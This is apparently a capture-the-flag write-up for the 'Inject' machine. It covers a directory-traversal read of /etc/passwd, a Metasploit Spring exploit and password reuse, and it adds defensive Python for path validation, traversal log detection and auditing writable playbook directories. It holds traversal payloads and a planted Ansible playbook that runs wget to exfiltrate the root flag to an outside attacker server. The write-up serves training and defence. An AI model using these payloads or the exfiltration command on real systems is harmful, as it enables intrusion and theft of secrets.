Inject

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 16:19 CDT
Nmap scan report for 10.10.11.204
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.19 seconds

If we look at the website on port 8080, we'll see that it has an upload function. After uploading a file, it's possible to view it.

Replacing the path of the file with ../../../../../../../etc/passwd works: the viewer serves the file, which shows that the file-viewing endpoint is vulnerable to local file inclusion (a directory-traversal path lets it read arbitrary files on the machine).
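Two things a defender would want around the bug just described: a file-serving routine that cannot be walked out of its upload directory, and a way to spot traversal attempts in access logs after the fact. Both are shown below as an added example; this is not code from the writeup or from the target application. The upload root, the `/view?file=` endpoint, the client addresses and the log lines are all constructed for the demo.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Assumed upload directory for the example; the writeup does not say where the
# application stores uploaded files.
UPLOAD_ROOT = "/var/www/uploads"


def resolve_upload(requested: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Map a user-supplied file name onto the upload directory.

    Returns the normalized absolute path, or None if the request would land
    outside ``root``. Normalization is lexical (os.path.normpath), so a symlink
    placed inside ``root`` could still point elsewhere; add os.path.realpath on
    top if the directory contents are not fully trusted.
    """
    # NUL bytes and absolute paths have no business in a file name.
    if "\x00" in requested or os.path.isabs(requested):
        return None
    root = os.path.normpath(os.path.abspath(root))
    candidate = os.path.normpath(os.path.join(root, requested))
    # normpath collapses the "../" run; commonpath then tells us where it ended up.
    if os.path.commonpath([root, candidate]) != root:
        return None
    if candidate == root:
        return None  # the directory itself is not a file to serve
    return candidate


# Constructed access-log lines (Apache/Tomcat common format) for the detection
# demo; none of these come from the target.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Mar/2023:16:25:01 -0500] "GET /view?file=cat.jpg HTTP/1.1" 200 5123
198.51.100.7 - - [13/Mar/2023:16:25:07 -0500] "GET /view?file=../../../../../../../etc/passwd HTTP/1.1" 200 1891
198.51.100.7 - - [13/Mar/2023:16:25:12 -0500] "GET /view?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1891
198.51.100.7 - - [13/Mar/2023:16:25:20 -0500] "GET /view?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
203.0.113.9 - - [13/Mar/2023:16:26:00 -0500] "GET /static/app.css HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A ".." segment bounded by a separator, a query delimiter, or the string ends.
DOTDOT_RE = re.compile(r'(?:^|[/\\?=&])\.\.(?:[/\\]|$)')


def find_traversal_requests(lines) -> List[Tuple[str, str, str]]:
    """Return (client, decoded_path, status) for every request whose path
    contains a '..' segment once URL-decoded. Decoding is applied twice so that
    double-encoded attempts (%252e%252e%252f) are caught as well."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, raw_path, status = m.groups()
        decoded = unquote(unquote(raw_path))
        if DOTDOT_RE.search(decoded):
            hits.append((client, decoded, status))
    return hits


if __name__ == "__main__":
    print(resolve_upload("report.pdf"))
    print(resolve_upload("../../../../../../../etc/passwd"))
    for client, path, status in find_traversal_requests(SAMPLE_LOG.splitlines()):
        print(f"{client} -> {path} ({status})")
```

The detection side is worth reading alongside the response codes: the encoded and double-encoded variants in the sample show why matching on the raw request string misses attempts that the server decodes before use, and why a 404 on a traversal path is still worth alerting on even though that particular request failed.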

After poking around for quite a while, I eventually found that this machine has a pom.xml file, which shows that the application is built with Maven and uses Spring Framework 3.2.3. This version is vulnerable and has a Metasploit module available.

Running the metasploit module exploit/multi/http/spring_cloud_function_spel_injection against the machine results in a shell as the user frank.

Inside of the home directory for frank, there's a hidden file which contains the password for phil.

Log in as phil using su, then cat the user flag!

Root flag

Running pspy shows that this machine runs all of the Ansible playbooks under /opt/automation/tasks about every 2 minutes. frank is unable to write there, but phil can.

Create a new playbook in the same directory and add a shell command to cat the root flag. The heredoc delimiter is quoted so that $(cat /root/root.txt) is written into the file literally and expanded when the playbook runs, not by the current shell as phil:

$ cat > playbook_2.yml << 'EOF'
- hosts: localhost
  tasks:
  - name: Getting the flag
    command: bash -c 'wget "http://10.10.16.11:8000/$(cat /root/root.txt)"'
EOF

Then start a web server on port 8000 and wait:

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.204 - - [13/Mar/2023 20:50:04] code 404, message File not found
10.10.11.204 - - [13/Mar/2023 20:50:04] "GET /<flag> HTTP/1.1" 404 -
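The root step above works because a privileged scheduler executes whatever it finds in a directory that an unprivileged user can write to. The check below is an added example of how an administrator would audit such a directory; it is not part of the writeup and does not touch /opt/automation/tasks. It builds a temporary stand-in directory with one correctly locked-down playbook and one that any user could overwrite, then reports every entry the scheduler's account does not exclusively control. The directory name, the file names and the `trusted_uids` handling are assumptions made for the demo.

```python
import os
import stat
import tempfile
from typing import List, Sequence, Tuple


def check_entry(path: str, trusted_uids: Sequence[int]) -> List[str]:
    """Return reasons why ``path`` could be altered by someone other than the
    trusted owner(s). An empty list means the entry looks safe."""
    st = os.lstat(path)
    reasons = []
    if stat.S_ISLNK(st.st_mode):
        reasons.append("symlink: the scheduler would follow it wherever it points")
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_task_dir(task_dir: str, trusted_uids: Sequence[int] = (0,)) -> List[Tuple[str, str]]:
    """Walk task_dir (the directory itself included) and collect (path, reason)
    pairs. A writable directory is as bad as a writable playbook: anyone who
    can create files there can drop in a playbook of their own."""
    findings = [(task_dir, r) for r in check_entry(task_dir, trusted_uids)]
    for dirpath, dirnames, filenames in os.walk(task_dir):
        # dirnames also lists symlinked directories, which walk() does not enter.
        for name in dirnames + filenames:
            entry = os.path.join(dirpath, name)
            for reason in check_entry(entry, trusted_uids):
                findings.append((entry, reason))
    return findings


def build_demo_dir() -> str:
    """Constructed stand-in for the tasks directory: playbook_1.yml is owned by
    the demo user and mode 644, playbook_2.yml is mode 666."""
    base = tempfile.mkdtemp(prefix="tasks_demo_")
    os.chmod(base, 0o755)
    for name, mode in (("playbook_1.yml", 0o644), ("playbook_2.yml", 0o666)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("- hosts: localhost\n  tasks: []\n")
        os.chmod(path, mode)  # 0o666 means anyone can edit what the scheduler runs
    return base


def demo() -> List[Tuple[str, str]]:
    base = build_demo_dir()
    # The demo runs as an ordinary user, so that user stands in for the
    # scheduler's account; on a real host the trusted set would be (0,) for root.
    return audit_task_dir(base, trusted_uids=(os.getuid(),))


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run against the real directory this would be `audit_task_dir("/opt/automation/tasks")` from a root cron job or a configuration-management check, with an alert on any non-empty result; the fix for a finding is to make the directory and every playbook in it owned by root and writable by root only.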